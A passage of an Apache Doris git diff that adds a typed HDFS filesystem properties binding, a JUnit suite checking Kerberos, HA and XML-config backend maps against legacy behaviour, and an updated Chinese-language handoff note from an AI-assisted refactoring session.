org.apache.doris.filesystem.FileSystem; -import org.apache.doris.filesystem.properties.FileSystemProperties; import org.apache.doris.filesystem.spi.FileSystemProvider; import java.io.IOException; @@ -29,7 +28,7 @@ * SPI provider for HDFS-family filesystems: hdfs, viewfs, ofs, jfs, oss. * Registered via META-INF/services for Java ServiceLoader discovery. */ -public class HdfsFileSystemProvider implements FileSystemProvider { +public class HdfsFileSystemProvider implements FileSystemProvider { public static final Set SUPPORTED_SCHEMES = Set.of("hdfs", "viewfs", "ofs", "jfs", "oss"); @@ -55,6 +54,18 @@ public boolean supports(Map properties) { || properties.containsKey("hadoop.kerberos.principal"); } + @Override + public HdfsFileSystemProperties bind(Map properties) { + return HdfsFileSystemProperties.of(properties); + } + + @Override + public FileSystem create(HdfsFileSystemProperties properties) throws IOException { + // DFSFileSystem builds its own Configuration (incl. the create()-side Kerberos authenticator) + // from the raw map via HdfsConfigBuilder; route through the unchanged create(Map) path. + return create(properties.rawProperties()); + } + @Override public FileSystem create(Map properties) throws IOException { return new DFSFileSystem(properties); diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/test/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/test/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemPropertiesTest.java new file mode 100644 index 00000000000000..56ea9c13710847 --- /dev/null +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/test/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemPropertiesTest.java @@ -0,0 +1,387 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.filesystem.hdfs; + +import org.apache.doris.filesystem.FileSystemType; +import org.apache.doris.filesystem.properties.BackendStorageKind; +import org.apache.doris.filesystem.properties.BackendStorageProperties; +import org.apache.doris.filesystem.properties.StorageKind; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.nio.file.Files; +import java.nio.file.Path; +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; + +/** + * Golden parity tests for {@link HdfsFileSystemProperties}. Each test pins {@code toMap()} (the typed BE map) + * to the exact key set legacy fe-core {@code HdfsProperties.getBackendConfigProperties()} would produce for + * the same input. This is the UT-level equivalence gate for the P1-T04 HDFS regression fix (DV-004 / R-007): + * the typed pipeline {@code getStorageProperties().toBackendProperties().toMap()} must re-produce the HDFS + * backend keys that flow into {@code THdfsParams}. + */ +class HdfsFileSystemPropertiesTest { + + private static Map beMap(Map input) { + Optional be = HdfsFileSystemProperties.of(input).toBackendProperties(); + Assertions.assertTrue(be.isPresent(), "HDFS must expose backend storage properties"); + Assertions.assertEquals(BackendStorageKind.HDFS, be.get().backendKind()); + return be.get().toMap(); + } + + @Test + void simpleAuthBackendMapMatchesLegacy() { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + + Map expected = new HashMap<>(); + expected.put("fs.defaultFS", "hdfs://nn:8020"); + expected.put("ipc.client.fallback-to-simple-auth-allowed", "true"); + expected.put("hdfs.security.authentication", "simple"); + + Assertions.assertEquals(expected, beMap(in)); + } + + @Test + void kerberosBackendMapMatchesLegacy() { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("hadoop.security.authentication", "kerberos"); + in.put("hadoop.kerberos.principal", "doris/_HOST@REALM"); + in.put("hadoop.kerberos.keytab", "/etc/security/doris.keytab"); + + Map expected = new HashMap<>(); + expected.put("fs.defaultFS", "hdfs://nn:8020"); + expected.put("ipc.client.fallback-to-simple-auth-allowed", "true"); + expected.put("hdfs.security.authentication", "kerberos"); + expected.put("hadoop.security.authentication", "kerberos"); + expected.put("hadoop.kerberos.principal", "doris/_HOST@REALM"); + expected.put("hadoop.kerberos.keytab", "/etc/security/doris.keytab"); + + Assertions.assertEquals(expected, beMap(in)); + } + + @Test + void kerberosViaDorisAliasSynthesizesHadoopKeys() { + // The Doris-flavored aliases (hdfs.authentication.*) drive the same emission as the hadoop.* keys. + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("hdfs.authentication.type", "kerberos"); + in.put("hdfs.authentication.kerberos.principal", "doris@REALM"); + in.put("hdfs.authentication.kerberos.keytab", "/etc/security/doris.keytab"); + + Map out = beMap(in); + Assertions.assertEquals("kerberos", out.get("hdfs.security.authentication")); + Assertions.assertEquals("kerberos", out.get("hadoop.security.authentication")); + Assertions.assertEquals("doris@REALM", out.get("hadoop.kerberos.principal")); + Assertions.assertEquals("/etc/security/doris.keytab", out.get("hadoop.kerberos.keytab")); + } + + @Test + void haConfigPassesThroughAndValidates() { + Map in = new HashMap<>(); + in.put("dfs.nameservices", "ns1"); + in.put("dfs.ha.namenodes.ns1", "nn1,nn2"); + in.put("dfs.namenode.rpc-address.ns1.nn1", "host1:8020"); + in.put("dfs.namenode.rpc-address.ns1.nn2", "host2:8020"); + in.put("dfs.client.failover.proxy.provider.ns1", + "org.apache.hadoop.hdfs.server.namenode.ha.ConfiguredFailoverProxyProvider"); + + Map out = beMap(in); + // Every dfs.* HA key passes through verbatim. + in.forEach((k, v) -> Assertions.assertEquals(v, out.get(k), "HA key should pass through: " + k)); + // And the always-on synthesized keys are present. + Assertions.assertEquals("true", out.get("ipc.client.fallback-to-simple-auth-allowed")); + Assertions.assertEquals("simple", out.get("hdfs.security.authentication")); + } + + @Test + void haConfigMissingFailoverProviderThrows() { + Map in = new HashMap<>(); + in.put("dfs.nameservices", "ns1"); + in.put("dfs.ha.namenodes.ns1", "nn1,nn2"); + in.put("dfs.namenode.rpc-address.ns1.nn1", "host1:8020"); + in.put("dfs.namenode.rpc-address.ns1.nn2", "host2:8020"); + // missing dfs.client.failover.proxy.provider.ns1 + + IllegalArgumentException ex = + Assertions.assertThrows(IllegalArgumentException.class, () -> HdfsFileSystemProperties.of(in)); + Assertions.assertTrue(ex.getMessage().contains("dfs.client.failover.proxy.provider.ns1"), ex.getMessage()); + } + + @Test + void haConfigSingleNamenodeThrows() { + Map in = new HashMap<>(); + in.put("dfs.nameservices", "ns1"); + in.put("dfs.ha.namenodes.ns1", "nn1"); + in.put("dfs.namenode.rpc-address.ns1.nn1", "host1:8020"); + + IllegalArgumentException ex = + Assertions.assertThrows(IllegalArgumentException.class, () -> HdfsFileSystemProperties.of(in)); + Assertions.assertTrue(ex.getMessage().contains("at least 2 namenodes"), ex.getMessage()); + } + + @Test + void hadoopUsernameEmitted() { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("hadoop.username", "doris"); + Assertions.assertEquals("doris", beMap(in).get("hadoop.username")); + } + + @Test + void allowFallbackOverridden() { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("ipc.client.fallback-to-simple-auth-allowed", "false"); + Assertions.assertEquals("false", beMap(in).get("ipc.client.fallback-to-simple-auth-allowed")); + } + + @Test + void defaultFsDerivedFromUri() { + Map in = new HashMap<>(); + in.put("uri", "hdfs://nn:8020/warehouse/db"); + + Map expected = new HashMap<>(); + expected.put("fs.defaultFS", "hdfs://nn:8020"); + expected.put("ipc.client.fallback-to-simple-auth-allowed", "true"); + expected.put("hdfs.security.authentication", "simple"); + + // 'uri' is not a hadoop./dfs./fs./juicefs. key, so it is NOT passed through; only fs.defaultFS is derived. + Assertions.assertEquals(expected, beMap(in)); + } + + @Test + void juicefsKeysPassThrough() { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "jfs://vol/"); + in.put("juicefs.meta", "redis://localhost:6379/0"); + Assertions.assertEquals("redis://localhost:6379/0", beMap(in).get("juicefs.meta")); + } + + @Test + void kerberosMissingKeytabThrows() { + Map in = new HashMap<>(); + in.put("hadoop.security.authentication", "kerberos"); + in.put("hadoop.kerberos.principal", "doris@REALM"); + // no keytab + IllegalArgumentException ex = + Assertions.assertThrows(IllegalArgumentException.class, () -> HdfsFileSystemProperties.of(in)); + Assertions.assertTrue(ex.getMessage().contains("principal or keytab is not set"), ex.getMessage()); + } + + @Test + void classifiersMatchHdfs() { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + HdfsFileSystemProperties p = HdfsFileSystemProperties.of(in); + Assertions.assertEquals("HDFS", p.providerName()); + Assertions.assertEquals(StorageKind.HDFS_COMPATIBLE, p.kind()); + Assertions.assertEquals(FileSystemType.HDFS, p.type()); + Assertions.assertEquals(BackendStorageKind.HDFS, p.backendKind()); + // BE-only model: no Hadoop-config conversion is exposed (catalog path stays on raw pass-through). + Assertions.assertTrue(p.toHadoopProperties().isEmpty()); + } + + @Test + void xmlResourcesAreLoadedIntoBackendMap() throws IOException { + Path dir = Files.createTempDirectory("hadoop_conf"); + Path xml = dir.resolve("hdfs-site.xml"); + Files.write(xml, + ("" + + "dfs.custom.keycustom-value" + + "fs.defaultFShdfs://from-xml:9000" + + "").getBytes(StandardCharsets.UTF_8)); + String prev = HdfsConfigFileLoader.hadoopConfigDirOverride; + HdfsConfigFileLoader.hadoopConfigDirOverride = dir.toString() + "/"; + try { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("hadoop.config.resources", "hdfs-site.xml"); + + Map out = beMap(in); + Assertions.assertEquals("custom-value", out.get("dfs.custom.key")); + // user-provided fs.defaultFS overrides the FILE-provided fs.defaultFS (overlay: XML < passthrough). + Assertions.assertEquals("hdfs://nn:8020", out.get("fs.defaultFS")); + Assertions.assertEquals("simple", out.get("hdfs.security.authentication")); + } finally { + HdfsConfigFileLoader.hadoopConfigDirOverride = prev; + } + } + + @Test + void provNameViaProvider() { + // bind() routes through HdfsFileSystemProperties.of and yields the typed model. + HdfsFileSystemProvider provider = new HdfsFileSystemProvider(); + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + HdfsFileSystemProperties bound = provider.bind(in); + Assertions.assertEquals("hdfs://nn:8020", bound.toMap().get("fs.defaultFS")); + } + + @Test + void emptyInputFallbackMatchesLegacy() { + // The framework auto-fallback HDFS storage is built with NO explicit keys; the BE map is just the + // two always-on synthesized keys (legacy initBackendConfigProperties produces the same). + Map expected = new HashMap<>(); + expected.put("ipc.client.fallback-to-simple-auth-allowed", "true"); + expected.put("hdfs.security.authentication", "simple"); + Assertions.assertEquals(expected, beMap(new HashMap<>())); + } + + @Test + void kerberosCredsPresentButSimpleTypeDoesNotSynthesize() { + // principal/keytab present but NO auth-type key => stays "simple": the hadoop.security.authentication + // synthesis block must NOT fire. The discriminator is hdfsAuthenticationType only, never the presence + // of principal/keytab (which still pass through via the hadoop.* prefix). + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("hadoop.kerberos.principal", "doris@REALM"); + in.put("hadoop.kerberos.keytab", "/etc/security/doris.keytab"); + + Map out = beMap(in); + Assertions.assertEquals("simple", out.get("hdfs.security.authentication")); + Assertions.assertNull(out.get("hadoop.security.authentication")); + // creds still flow to BE via passthrough. + Assertions.assertEquals("doris@REALM", out.get("hadoop.kerberos.principal")); + Assertions.assertEquals("/etc/security/doris.keytab", out.get("hadoop.kerberos.keytab")); + } + + @Test + void viewfsAndJfsUrisDeriveDefaultFs() { + Map viewfs = new HashMap<>(); + viewfs.put("uri", "viewfs://cluster/warehouse"); + Assertions.assertEquals("viewfs://cluster", beMap(viewfs).get("fs.defaultFS")); + + Map jfs = new HashMap<>(); + jfs.put("uri", "jfs://vol/warehouse"); + Assertions.assertEquals("jfs://vol", beMap(jfs).get("fs.defaultFS")); + } + + @Test + void ofsAndOssUrisDoNotDeriveDefaultFs() { + // ofs/oss are bound by the provider but are NOT in URI_SCHEMES, so no fs.defaultFS is derived (legacy + // parity: legacy supportSchema = {hdfs, viewfs, jfs}). + Map ofs = new HashMap<>(); + ofs.put("uri", "ofs://cluster/warehouse"); + Assertions.assertNull(beMap(ofs).get("fs.defaultFS")); + + Map oss = new HashMap<>(); + oss.put("uri", "oss://bucket/warehouse"); + Assertions.assertNull(beMap(oss).get("fs.defaultFS")); + } + + @Test + void allowFallbackBlankUsesDefault() { + // An explicit blank value is filtered by binding (isNotBlank gate) so the field stays default "" + // and the else-branch emits "true" — matching legacy. + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("ipc.client.fallback-to-simple-auth-allowed", ""); + Assertions.assertEquals("true", beMap(in).get("ipc.client.fallback-to-simple-auth-allowed")); + } + + @Test + void multiUriDoesNotDeriveDefaultFs() { + // A comma-separated uri list is not a usable single fs.defaultFS (legacy getUri returns null). + Map in = new HashMap<>(); + in.put("uri", "hdfs://nn1:8020,hdfs://nn2:8020"); + Assertions.assertNull(beMap(in).get("fs.defaultFS")); + } + + @Test + void haConfigMissingNamenodesKeyThrows() { + Map in = new HashMap<>(); + in.put("dfs.nameservices", "ns1"); + // missing dfs.ha.namenodes.ns1 + IllegalArgumentException ex = + Assertions.assertThrows(IllegalArgumentException.class, () -> HdfsFileSystemProperties.of(in)); + Assertions.assertTrue(ex.getMessage().contains("dfs.ha.namenodes.ns1"), ex.getMessage()); + } + + @Test + void haConfigMissingRpcAddressThrows() { + Map in = new HashMap<>(); + in.put("dfs.nameservices", "ns1"); + in.put("dfs.ha.namenodes.ns1", "nn1,nn2"); + in.put("dfs.namenode.rpc-address.ns1.nn1", "host1:8020"); + // missing rpc-address for nn2 + IllegalArgumentException ex = + Assertions.assertThrows(IllegalArgumentException.class, () -> HdfsFileSystemProperties.of(in)); + Assertions.assertTrue(ex.getMessage().contains("dfs.namenode.rpc-address.ns1.nn2"), ex.getMessage()); + } + + @Test + void haConfigMultiNameserviceWithWhitespaceValidates() { + // Comma + whitespace nameservices are trimmed and each is validated independently. + Map in = new HashMap<>(); + in.put("dfs.nameservices", "ns1, ns2"); + in.put("dfs.ha.namenodes.ns1", "nn1,nn2"); + in.put("dfs.namenode.rpc-address.ns1.nn1", "h1:8020"); + in.put("dfs.namenode.rpc-address.ns1.nn2", "h2:8020"); + in.put("dfs.client.failover.proxy.provider.ns1", "x.Provider"); + in.put("dfs.ha.namenodes.ns2", "nn3,nn4"); + in.put("dfs.namenode.rpc-address.ns2.nn3", "h3:8020"); + in.put("dfs.namenode.rpc-address.ns2.nn4", "h4:8020"); + in.put("dfs.client.failover.proxy.provider.ns2", "x.Provider"); + + Assertions.assertEquals("h3:8020", beMap(in).get("dfs.namenode.rpc-address.ns2.nn3")); + } + + @Test + void malformedUriFailsLoud() { + // Parity with legacy: a malformed uri (no explicit fs.defaultFS) fails loud at bind, not silently. + Map in = new HashMap<>(); + in.put("uri", "hdfs://nn:8020/a path{bad}"); + Assertions.assertThrows(IllegalArgumentException.class, () -> HdfsFileSystemProperties.of(in)); + } + + @Test + void configDirResolvedFromEngineSystemProperty() throws IOException { + // F1 wiring: with no explicit override, the loader resolves the config dir from the engine-set system + // property (fe-core FileSystemFactory sets it from Config.hadoop_config_dir for non-default installs). + Path dir = Files.createTempDirectory("hadoop_conf_sysprop"); + Path xml = dir.resolve("core-site.xml"); + Files.write(xml, + ("" + + "dfs.sysprop.keyv" + + "").getBytes(StandardCharsets.UTF_8)); + String prevOverride = HdfsConfigFileLoader.hadoopConfigDirOverride; + String prevProp = System.getProperty(HdfsConfigFileLoader.CONFIG_DIR_PROPERTY); + HdfsConfigFileLoader.hadoopConfigDirOverride = null; // force the system-property path + System.setProperty(HdfsConfigFileLoader.CONFIG_DIR_PROPERTY, dir.toString() + "/"); + try { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("hadoop.config.resources", "core-site.xml"); + Assertions.assertEquals("v", beMap(in).get("dfs.sysprop.key")); + } finally { + HdfsConfigFileLoader.hadoopConfigDirOverride = prevOverride; + if (prevProp == null) { + System.clearProperty(HdfsConfigFileLoader.CONFIG_DIR_PROPERTY); + } else { + System.setProperty(HdfsConfigFileLoader.CONFIG_DIR_PROPERTY, prevProp); + } + } + } +} diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 145a7628c10937..aceb40c01b14fe 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,62 +7,58 @@ --- -**更新时间**:2026-06-17(实现 session:P1-T04 + **P1-T05** 完成) +**更新时间**:2026-06-17(实现 session:**FU-T01 完成** — HDFS typed BE model,R-007 闭环) **更新人**:Claude(Opus 4.8) -## 这次 session 完成了什么(P1-T04 + P1-T05) +## 这次 session 完成了什么(FU-T01) -**P1-T05 ✅(最新)**:删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖块(**仅删 pom 边**——import/call 已在 P1-T03 清,DV-003-b;fe-property 模块本身不删 D-005 → 变 0 消费者孤儿)。recon 证 paimon src(main+test)`org.apache.doris.property` 已 **ZERO**、唯一物理耦合 = pom :72,其余 `fe-property` 字样皆历史注释(不动,surgical)。**RED/GREEN = 构建闸**(无 UT 可写):删后全模块编译 + 全 UT 仍绿 = 证无隐藏 transitive 断裂。验证:paimon 全模块 **293/0/0/1skip**(含 P1-T04 新增 1 测试)、grep 归零、pom 无 fe-property、checkstyle 0、import-gate PASS、白名单干净(仅 pom 1 文件)。**P1 storage 收口的依赖边正式断开**(trivial 机械改,未跑对抗 review)。 +**FU-T01 ✅(D-010 授权,提升为 active)**:给 `fe-filesystem-hdfs` 新建 **HDFS typed BE model**,修复 P1-T04 全量切 typed BE 路引入的 HDFS BE 配置回归(**DV-004 / R-007 闭环**)。 ---- +**做了什么(仅 fe-filesystem-hdfs 核心 + 3 个已白名单文件的微改/注释)**: +1. **`HdfsFileSystemProperties.java`(新)**:`implements FileSystemProperties, BackendStorageProperties`(**BE-only,不实现 HadoopStorageProperties**——catalog/Hadoop 路保持 P1-T03 后的 raw passthrough,零新行为)。`toMap()` = **忠实移植 legacy `HdfsProperties.initBackendConfigProperties()`**(XML 资源 + `hadoop./dfs./fs./juicefs.` 透传 + 恒发 `ipc.client.fallback…`/`hdfs.security.authentication` + kerberos 块 + `hadoop.username`);`validate()` = kerberos required-check + `checkHaConfig`(inline 移植 `HdfsPropertiesUtils`)。`backendKind()=HDFS`、`type()=HDFS`、`kind()=HDFS_COMPATIBLE`。**移植源 = fe-property `HdfsProperties`(依赖轻 BE-key-only 孪生)→ parity by construction**。 +2. **`HdfsConfigFileLoader.java`(新)**:XML `hadoop.config.resources` 加载(移植 fe-property `PropertyConfigLoader`)。**F1 接线**:dir 经 `resolveHadoopConfigDir()` 读 sysprop `doris.hadoop.config.dir`(fe-core 设),默认 `$DORIS_HOME/plugins/hadoop_conf/`(与 `Config.hadoop_config_dir` 默认相同)。 +3. **`HdfsFileSystemProvider.java`(改)**:re-type 为 `FileSystemProvider` + 新增 `bind()`/`create(P)`;**`create(Map)`/`supports()` 字节不变**(hive/iceberg/broker FE filesystem 路零回归——既有 `DFSFileSystemTest` 25/0 证)。 +4. **`pom.xml`(改)**:+`fe-foundation`+`commons-lang3`(镜像 sibling s3;packaging 经 review 证无跨 loader 风险)。 +5. **F1 接线(用户选「现在接好」)**:fe-core `FileSystemFactory.bindAllStorageProperties`(**项目 P1-T02 加的方法**,+1 行 `System.setProperty("doris.hadoop.config.dir", Config.hadoop_config_dir)`)→ leaf 读 sysprop → 非默认 `hadoop_config_dir` 安装也对齐 legacy。 +6. **stale 注释修**(本改动作废):`FileSystemPluginManager.bindAll` javadoc 去 HDFS skip-list(项目 P0-T02 加的方法)、paimon `PaimonScanPlanProvider` `KNOWN GAP 1`→标 CLOSED。 +7. **kerberos = K1**(用户 AskUserQuestion 选):BE-key 字符串内联发射,**不建 fe-kerberos**、**不碰** fe-filesystem-hdfs 现有 create()-side `KerberosHadoopAuthenticator`。recon 证 BE model 仅需字符串、不需 fe-kerberos(真 `UGI.doAs` 留 fe-core/ctx + 现有 DFSFileSystem,§5 不变量 4)。 + +**TDD/验证**:25 golden parity UT 钉 `toMap()`==legacy BE 键集(simple/kerberos/kerberos-via-Doris-alias/HA+3 负例/username/uri-derive/viewfs-jfs derive vs ofs-oss no-derive/allowFallback-blank/multi-uri/malformed-uri-fail-loud/XML/sysprop)。**fe-filesystem-hdfs 全模块 78/0/0** + checkstyle 0 + **RED/GREEN 经 mutation 证**(关 kerberos 块→`kerberosViaDorisAlias` 红)+ **fe-core `-pl fe-core -am compile` 绿**(验 FileSystemFactory/PluginManager 改)+ `git diff` 白名单干净。 -**P1-T04 ✅(本 session 较早)**: -1. **paimon BE 静态凭据切 typed 路**:`PaimonScanPlanProvider.getScanNodeProperties()` 的 BE 静态凭据块从 `ctx.getBackendStorageProperties()` 改为遍历 `ctx.getStorageProperties()` 调 `sp.toBackendProperties().ifPresent(b → backendStorageProps.putAll(b.toMap()))` → 发 `location.`(镜像 P1-T03 `.ifPresent` 风格)。**vended 块(`ctx.vendStorageCredentials`)不动、仍叠在静态块之后**→vended overlays static 保序。加 `org.apache.doris.filesystem.properties.StorageProperties` import;pom 无需改(fe-filesystem-api 依赖 P1-T03 已加)。**仅改 `PaimonScanPlanProvider.java` 1 主文件 + 其测试**。 -2. **关键 recon 发现(DV-002 未覆盖)+ 用户定向**:新 typed 路对 **HDFS 物理上产不出 BE 键**(fe-filesystem **无 HDFS typed BE model**:`HdfsFileSystemProvider` 未 override `bind()`→默认抛 `UnsupportedOperationException`→`FileSystemPluginManager.bindAll` catch 跳过→`getStorageProperties()` 对 HDFS catalog 返回空)。legacy `getBackendStorageProperties()`(fe-core `HdfsProperties.getBackendConfigProperties`)发的 HDFS `hadoop/dfs/HA/kerberos` 键经 `PluginDrivenScanNode→FileQueryScanNode.setLocationPropertiesIfNecessary→HdfsResource.generateHdfsParam→THdfsParams` 是 **load-bearing**→全量切会丢→HDFS paimon 原生读回归。又:`getBackendStorageProperties()` 是 **ConnectorContext 方法、不依赖 fe-property**→**P1-T05 并不需要本切换**,切换纯为 D-003 统一。**用户 2026-06-17 定:按原计划全量切 + 接受 HDFS BE 回归 + follow-up 补 fe-filesystem `HdfsFileSystemProperties`**(记 **DV-004 / R-007 / FU-T01**)。 -3. **TDD**:`scanContext` helper 改喂 `getStorageProperties()` 的 fake `StorageProperties`(删 `getBackendStorageProperties` override)→ `getScanNodePropertiesNormalizesStaticCreds` RED(`expected ak was null`)→ 切产线 GREEN。 -4. **对抗 review confirm 修**:新增 1 测试 `...SkipsStoragePropsWithoutBackendMappingAndMergesRest`(混 `Optional.empty()`-无-BE 项[HDFS-like] + 真对象存储项 → 钉 `.ifPresent` 跳过 + 多 entry `putAll` merge;mutation `.ifPresent→.get()`→RED)+ 2 helper(`scanContextWithStorage`/`fakeStorageWithoutBackend`)。 -5. **验证**:`PaimonScanPlanProviderTest` **52/0**、paimon 全模块 **292/0/0/1skip**、**checkstyle 0**、`tools/check-connector-imports.sh` PASS、`git diff --name-only` 白名单干净(2 文件)、零 `org.apache.doris.property/datasource` import。 -6. **对抗 review**(`wf_09745716-d48`,10 agent,3 lens + verify):7 finding confirm 4。**confirm 1 MAJOR=R-008**(fe-filesystem `Oss/Cos/ObsFileSystemProperties.toBackendKv()` 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`,legacy 对无凭据 OSS/COS/OBS 发 `ANONYMOUS`;S3 typed 有;**fix 在 fe-filesystem 超 P1 白名单**→记 R-008 + **FU-T02**;仅影响无 ak/sk 的 OSS/COS/OBS,带 IAM-role 主机会误取 instance 凭据,公开桶仍 anonymous 非硬失败)+ **3 test-gap 已修**(上条测试)。verify **推翻 3 假 finding**:AWS_BUCKET/ROOT_PATH 超集=DV-002 已接受非回归;「测试没钉新 seam」被**实测 mutation 推翻**(回退旧 seam→RED);OverlaysVended 静态缺失由 sibling NormalizesStaticCreds 覆盖。 +**对抗 review(`wf_5db99e32-2ad`,27 agent,4 lens + verify)**:清场——packaging 无跨 loader 风险、独立 agent 逐键复核 byte-level parity、BE-only 无新 catalog 路回归、强 oss-hdfs-wrong-keys 断言被 verify **推翻**、`new Configuration()` 默认 bloat 是 legacy-faithful。**3 实质修**:①malformed-`uri` swallow→**fail-loud**(对齐 legacy);②2 stale 注释;③+11 测试。**F1**(config-dir 未接 `Config.hadoop_config_dir`)→ 用户选「现在接好」=sysprop 桥。 ## 当前状态 -- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧(P1 5/6,仅剩 P1-T06 验证)**。 -- 任务计数 **7/14**(P0: 2/2 ✅ | P1: 5/6 | P2: 0/5 | P3a: 0/1)| follow-up 占位 P3b/FU-T01/FU-T02。 -- **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 配置 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`(P1-T03);BE 扫描分片 `PaimonScanPlanProvider`→`getStorageProperties().toBackendProperties().toMap()`→`location.*`(P1-T04,vended overlays static 不动)。 -- paimon 已**零** `org.apache.doris.property/datasource` import **+ pom 无 fe-property 依赖**(P1-T05);fe-property 变 0 消费者孤儿(本次不物理删,D-005)。 -- ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,fix 超 P1 白名单)**:①HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);②无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。用户接受、follow-up 修、docker P1-T06 会暴露(**非新 bug**)。 +- 阶段:Research ✅ / Design ✅(**10 决策 D-001..D-010**)/ **Implement 🚧(P1 5/6 + FU-T01 ✅,仅剩 P1-T06 验证)**。 +- 任务计数 **8/14**(P0: 2/2 ✅ | P1: 5/6 | **FU-T01 ✅** | P2: 0/5 | P3a: 0/1)| follow-up 占位 FU-T02 + P3b。 +- **R-007 已闭环**(HDFS typed BE model 落地)。typed BE 路现对 S3/OSS/COS/OBS/**HDFS** 全产 BE 键。 - ⚠️ **e2e/docker 未跑**(本 session 仅 compile + UT + 对抗 review)。 ## 下一步(明确):P1-T06(P1 验证收口) -> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手。** 下面是已知方案,但须现场核实。 - -**目标**:P1 收口验证。(1) paimon UT 全绿(**已 293/0/1skip**);(2) docker `enablePaimonTest=true` 跑 paimon **5 flavor**(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS;(3) **真 T1 等价闸 Option C**——docker 真 fe-filesystem 对象存储 impl 在 classpath,端到端读私有对象存储桶验 storage 配置/凭据真发(UT 因 impl 是运行时插件无法验,故 docker 兜底)。 - -**重点验已知边界(本 session 引入,须区分「已知接受」vs「真新回归」)**: -- **R-007(HDFS 回归,已接受)**:HDFS-warehouse paimon flavor 的 BE 原生读会因缺 `THdfsParams` 失败/降级(fe-filesystem 无 HDFS typed BE model,DV-004/FU-T01)。docker HDFS flavor **应暴露此回归**——确认它就是 R-007、**非新 bug**(勿误判为本次破坏)。若 docker filesystem flavor 用 HDFS warehouse → 预期失败;用 local/对象存储 → 应正常。 -- **R-008(无凭据 OSS/COS/OBS ANONYMOUS 漂移,已接受)**:仅无 ak/sk 的 OSS/COS/OBS catalog 受影响(FU-T02);带 ak/sk 的不受影响。 -- **R-006(调优默认无 UT 守护)**:docker 运行期兜底确认 S3 50/3000/1000、OSS/COS/OBS 100/10000/10000 真发。 - -**先做 recon(关键未知)**:读 docker 编排 + regression suite 的 paimon flavor 覆盖(`enablePaimonTest` gate 位置、5 flavor 如何起、各 flavor 用何 warehouse 后端=对象存储 or HDFS);确认哪些 flavor 真跑对象存储(验 P1-T03/T04 storage 路)、哪些跑 HDFS(触发 R-007)。可用技能 `doris-docker-regression` / `regression_doris`。 - -**若本环境不部署 docker → 明确标「未跑 e2e」**(CLAUDE.md Rule 12),不得把「UT 过 + 编译过」当「e2e 验过」。P1-T06 不跑 docker 即不能算真正收口,需在 PROGRESS/HANDOFF 标注待补。 +> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手。** -**之后**:P1 收口 → P2(metastore SPI:P2-T01 新建 fe-connector-metastore-api …);follow-up FU-T01/FU-T02/R-006 与 fe-filesystem 收口批次同做。 +**P1-T06**:paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` **5 flavor**(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS + **真 T1 等价闸 Option C**。 +- **FU-T01 已补 → HDFS-warehouse flavor(含 HA / kerberized HMS+HDFS)应转通过**(R-007 闭环验证点;之前是已接受回归)。 +- R-008(无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`)docker 会暴露 → **仍 FU-T02 独立**(超白名单)。 +- R-006(fe-filesystem 调优默认无 UT 守护)docker 兜底。 +- **不部署 docker 则明确标「未跑 e2e」**(CLAUDE.md Rule 12)。 +- 之后 P2(metastore SPI:P2-T01 新建 fe-connector-metastore-api …)+ P3a(fe-kerberos 叶子)。 ## 未决 / 需注意 -- ✅ 已定:范围 P0+P1(到 P1-T06)|机制 A(D-009)|T1=Option C(DV-003)|P1-T04 全量切 + 接受 fe-filesystem typed BE model 缺口回归(用户 2026-06-17)。 -- ❗ 